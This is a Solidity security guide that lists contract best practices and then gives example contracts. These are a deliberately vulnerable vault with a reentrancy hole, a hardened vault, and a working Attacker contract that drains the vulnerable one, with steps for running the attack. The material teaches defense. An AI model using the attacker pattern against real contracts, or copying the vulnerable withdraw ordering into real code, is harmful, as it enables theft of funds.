  • Least Privilege: Grant contracts and addresses only the permissions they need, and gate privileged functions behind an explicit access-control check (for example OpenZeppelin's Ownable or AccessControl) rather than leaving them callable by anyone.
  • Immutable Contracts: Once deployed, contract logic should be final; if upgradeability is required, design it explicitly (proxy pattern, timelock, documented admin keys) so that the upgrade path is itself reviewed and constrained.
  • Input Validation: Validate every argument of every external and public function (zero values, bounds, addresses, array lengths) and revert early, so unexpected state or exploitable behavior cannot be reached.
  • Reentrancy Protection: Follow the checks-effects-interactions order (validate, update state, then make external calls) whenever handling Ether or token transfers, and add OpenZeppelin's ReentrancyGuard as a second line of defense.
  • Safe Math: Solidity >=0.8 reverts on integer overflow and underflow, but that protection is disabled inside unchecked {} blocks and does not cover precision loss from integer division or the silent truncation of explicit downcasts; check critical math operations explicitly.
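The following contracts are an added example, not code from the original page: a deliberately vulnerable vault with the reentrant window the list warns about, a hardened version applying checks-effects-interactions, ReentrancyGuard, input validation and owner-only privileged operations, and a minimal attacker that drains the vulnerable one. The contract names are hypothetical, and the import paths assume OpenZeppelin Contracts v5 is installed in the project.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not from the original page. Assumes OpenZeppelin Contracts v5
// at the import paths below; contract names are hypothetical.
import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";

/// Vulnerable: sends Ether before clearing the balance, so a malicious
/// receiver can re-enter withdraw() and drain the contract.
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}(""); // external call first...
        require(ok, "transfer failed");
        balances[msg.sender] = 0;                          // ...state update last: reentrant window
    }
}

/// Hardened: checks-effects-interactions ordering plus ReentrancyGuard,
/// input validation on every entry point, and owner-only privileged ops.
contract HardenedVault is ReentrancyGuard, Ownable {
    uint256 public constant MAX_DEPOSIT = 100 ether;
    mapping(address => uint256) public balances;
    bool public paused;

    event Deposited(address indexed who, uint256 amount);
    event Withdrawn(address indexed who, uint256 amount);

    error Paused();
    error ZeroAmount();
    error DepositTooLarge(uint256 amount, uint256 max);
    error InsufficientBalance(uint256 requested, uint256 available);

    constructor(address initialOwner) Ownable(initialOwner) {}

    /// Least privilege: only the owner may pause; no other address gets this capability.
    function setPaused(bool p) external onlyOwner {
        paused = p;
    }

    function deposit() external payable {
        if (paused) revert Paused();
        if (msg.value == 0) revert ZeroAmount();
        if (msg.value > MAX_DEPOSIT) revert DepositTooLarge(msg.value, MAX_DEPOSIT);
        balances[msg.sender] += msg.value;   // 0.8+ checked arithmetic reverts on overflow
        emit Deposited(msg.sender, msg.value);
    }

    function withdraw(uint256 amount) external nonReentrant {
        // Checks: validate caller input before touching state
        if (paused) revert Paused();
        if (amount == 0) revert ZeroAmount();
        uint256 bal = balances[msg.sender];
        if (amount > bal) revert InsufficientBalance(amount, bal);
        // Effects: update state before any external interaction
        balances[msg.sender] = bal - amount; // cannot underflow: bounded by the check above
        emit Withdrawn(msg.sender, amount);
        // Interactions: external call last; nonReentrant blocks re-entry regardless
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

/// Attacker against VulnerableVault: re-enters withdraw() from receive()
/// while the vault still has funds, before the vault zeroes the balance.
contract Attacker {
    VulnerableVault public immutable target;

    constructor(VulnerableVault t) {
        target = t;
    }

    function attack() external payable {
        target.deposit{value: msg.value}();
        target.withdraw();
    }

    receive() external payable {
        // Keep re-entering while the vault can still pay our recorded balance.
        if (address(target).balance >= msg.value) {
            target.withdraw();
        }
    }
}
```

Deploy VulnerableVault, fund it from a second account, then call Attacker.attack() with 1 ether: each incoming payment triggers receive(), which calls withdraw() again before balances[attacker] has been cleared, so the same recorded balance is paid out repeatedly. Against HardenedVault the same attack fails twice over: the balance is already reduced when the Ether is sent, and the nonReentrant modifier reverts the nested call.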